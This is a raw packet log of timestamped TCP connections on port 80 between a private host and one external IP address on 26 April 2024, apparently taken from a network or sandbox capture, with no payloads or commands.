Apr 26, 2024 04:43:01.153438091 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.153486013 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.153928995 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.153974056 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.154149055 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.154196978 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.154246092 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.154289961 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.154314041 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.154359102 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.154378891 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.154392004 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.154419899 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.154443979 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.281814098 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.336344957 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.336363077 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.336389065 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.336415052 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.336498976 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.336532116 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.470293045 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.470496893 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.472636938 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.660028934 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:01.660120010 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:01.847656012 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.541904926 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.541935921 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.541949034 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.542004108 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.542177916 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.550173998 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.550324917 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.550573111 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.550617933 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.550749063 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.550795078 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.550867081 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.550909042 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.551116943 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.551167011 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.551167965 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.551208019 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.688146114 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.729640961 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.729712963 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.729736090 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.729892015 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.889264107 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:02.889384031 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:02.891159058 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.085127115 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.085201979 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.275039911 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.954221010 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.954283953 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.954467058 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.954468012 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.963582039 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.963658094 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.963936090 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.963984966 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.964090109 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.964138985 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.964334011 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.964390039 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.964476109 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.964519024 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.964526892 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.964562893 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:03.964731932 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.964745998 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:03.964797974 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:04.095364094 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:04.142900944 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:04.142955065 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:04.143130064 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:04.143131018 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:04.286526918 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:04.286652088 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:04.288589954 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:04.478487968 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:04.478672028 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:04.669009924 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.382873058 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.382921934 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.382993937 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.383312941 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.383610964 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.383667946 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.383722067 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.383775949 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.384151936 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.384201050 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.384450912 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.384499073 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.393333912 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.393402100 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.393635988 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.393687963 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.393723011 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.393771887 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.517757893 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.572804928 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.572851896 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.572864056 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.572907925 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.705152988 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.705262899 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.708324909 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:05.896250010 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:05.896349907 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.084556103 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.778214931 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.778306007 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.778343916 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.778390884 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.787729025 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.787821054 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.788065910 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.788135052 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.788193941 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.788324118 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.788366079 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.788427114 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.788427114 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.788446903 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.788502932 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.966325045 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.966571093 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.966634035 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.973220110 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.973277092 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.973510981 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:06.987046003 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.987162113 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:06.987504005 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.000066042 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.000221014 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.000447035 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.013247013 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.013323069 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.013534069 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.026599884 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.026695967 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.026772976 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.039983988 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.040116072 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.040168047 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.053389072 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.053451061 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.053497076 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.066775084 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.066838026 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.066906929 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.080008984 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.080055952 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.080116987 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.094945908 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.154995918 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.155081987 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.155177116 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.155419111 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.161947966 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.161993027 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.162154913 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.175282001 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.175342083 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.175369978 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.175468922 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.187002897 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.187199116 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.187267065 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.187267065 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.198744059 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.198786974 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.198928118 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.198929071 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.210235119 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.210371017 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.210481882 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.210481882 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.221230030 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.221337080 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.221369982 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.221661091 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.232171059 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.232357025 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.232372999 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.232568026 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.243246078 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.243354082 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.243390083 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.243583918 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.254498959 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.254611969 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.254637957 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.254825115 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.265456915 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.265546083 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.265620947 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.265723944 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.276509047 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.276628017 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.276710987 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.276710987 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.294408083 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.488656044 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.488840103 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.513137102 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.701730013 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:07.701816082 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:07.890656948 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.631318092 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.631377935 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.631414890 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.631442070 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.631443024 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.631532907 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.645730019 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.645798922 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.646087885 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.646128893 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.646141052 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.646163940 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.646188974 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.646213055 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.646353006 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.646393061 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.646405935 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.646442890 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.646560907 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.646614075 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.765850067 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.819107056 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.819170952 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.819195032 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.819214106 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.819307089 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.819330931 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.957479000 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:08.957592010 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:08.959356070 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:09.153353930 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:09.153456926 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:09.343153954 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.088924885 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.088985920 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.089072943 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.089101076 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.089131117 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.089164972 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.089241982 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.089289904 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.089793921 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.089875937 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.089884996 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.089925051 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.089930058 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.089977026 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.098485947 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.098547935 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.098561049 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.098587990 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.098591089 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.098638058 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.270369053 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.277530909 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.277628899 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.277765036 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.459268093 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.459387064 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.461205006 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.652041912 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:10.652117968 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:10.841603041 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.509917974 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.509979963 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.510035992 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.510066986 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518042088 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518167019 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518213987 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518341064 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518359900 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518394947 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518484116 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518527985 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518537998 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518567085 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518578053 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518605947 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518618107 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518652916 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.518826962 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.518929958 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.659666061 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.699182034 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.699304104 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.699321985 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.699361086 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.847567081 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:11.847877026 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:11.850755930 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.038553953 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.038635969 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.226906061 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.917645931 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.917800903 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.917958975 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.918020964 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.934223890 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.934279919 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.939455032 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.939512014 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.939558983 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.939598083 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.939623117 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.939645052 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.940215111 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.940264940 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.940279961 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.940351009 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:12.940352917 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:12.940406084 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.070328951 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.105925083 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.106101036 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.106163025 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.106209993 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.106276989 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.120346069 CEST	80	49788	45.77.223.48	192.168.2.4
